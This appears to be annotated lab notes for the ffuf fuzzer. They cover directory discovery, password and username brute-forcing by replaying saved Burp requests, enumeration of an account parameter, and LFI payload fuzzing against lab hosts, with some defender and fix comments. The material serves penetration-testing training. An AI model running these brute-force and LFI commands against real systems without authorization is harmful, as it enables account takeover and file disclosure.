ffuf
# Content discovery: every wordlist entry is substituted for FUZZ in the URL path.
# The ":FUZZ" suffix on the wordlist names the keyword (FUZZ is also ffuf's default).
ffuf \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ \
  -u http://10.0.0.10:80/FUZZ
# Password fuzzing by replaying a request saved from Burp Suite.
#   1. Capture the login request that carries "username=sadf&password=asdasd".
#   2. Right-click the request and choose "Copy to file" (req.txt below).
#   3. In the saved file, replace the password value with the keyword: "password=FUZZ".
# -request-proto http : the raw request is replayed over plain HTTP (ffuf defaults to https).
# -fs 1814            : hide every response whose size is 1814 bytes. The number comes from
#                       this lab (presumably its failed-login page) and must be re-measured
#                       per target; it also assumes failed logins always have the same size.
# Defender view: this is one login attempt per wordlist entry against a single account,
# so rate limiting or lockout on the login endpoint stops it and the auth log records it.
ffuf -request req.txt -request-proto http \
  -w /usr/share/wordlists/seclists/SecLists-master/Passwords/xato-net-10-million-passwords-10000.txt \
  -fs 1814
# Username + password fuzzing with two wordlists.
#   1. Capture the login request that carries "username=asd&password=asdasd".
#   2. Right-click the request and choose "Copy to file" (req.txt below).
#   3. In the saved file, set "username=FUZZUSER" and "password=FUZZPASS".
# -mode clusterbomb : try every username with every password, so the request count is
#                     (number of usernames) x (number of passwords).
# -fs 3256,3376     : hide responses of 3256 or 3376 bytes (comma-separated list). These
#                     sizes are specific to this lab's responses; re-measure them per target.
ffuf -request req.txt -request-proto http \
  -mode clusterbomb \
  -w /usr/share/wordlists/seclists/SecLists-master/Usernames/top-usernames-shortlist.txt:FUZZUSER \
  -w pass.txt:FUZZPASS \
  -fs 3256,3376
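# Iterate the "account" parameter over the values in number1000-2000.txt and keep only
# the responses that contain "admin".
# -mr : match regexp; a response is reported only when the pattern matches it.
# The URL is quoted because "?" is a shell glob character: unquoted, the shell may try
# to expand the word as a filename pattern (zsh aborts with "no matches found").
# NOTE(review): a hit presumably means the page returned another account's data for a
# guessed id, i.e. the parameter is not checked against the logged-in user; confirm in the lab.
ffuf -u 'http://localhost/labs/e0x02.php?account=FUZZ' -w number1000-2000.txt -mr "admin"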
# LFI fuzzing of a file-name parameter from a saved request.
#   1. Put the FUZZ keyword in the parameter inside req.txt, e.g.
#      /labs/api/fetchRecipe.php?filename=FUZZ
# -fw 19,20 : hide responses whose word count is 19 or 20; on this lab those are the
#             error responses returned for payloads that did not work.
# NOTE(review): a response that survives the filter suggests the filename value reaches a
# file read unchecked; the fix is to resolve the path and allow only an expected directory.
ffuf -request req.txt -request-proto http \
  -w /usr/share/wordlists/seclists/SecLists-master/Fuzzing/LFI/LFI-Jhaddix.txt \
  -fw 19,20
# Same LFI wordlist, replayed against the request saved in api-req.txt.
# -fw hides the responses produced by invalid payloads, identified by their word count.
# Tuning: when an error response with another word count shows up in the output
# (for example 19 words), add that count to -fw and run again until only real hits remain.
ffuf -request api-req.txt -request-proto http \
  -w /usr/share/wordlists/seclists/SecLists-master/Fuzzing/LFI/LFI-Jhaddix.txt \
  -fw 19,20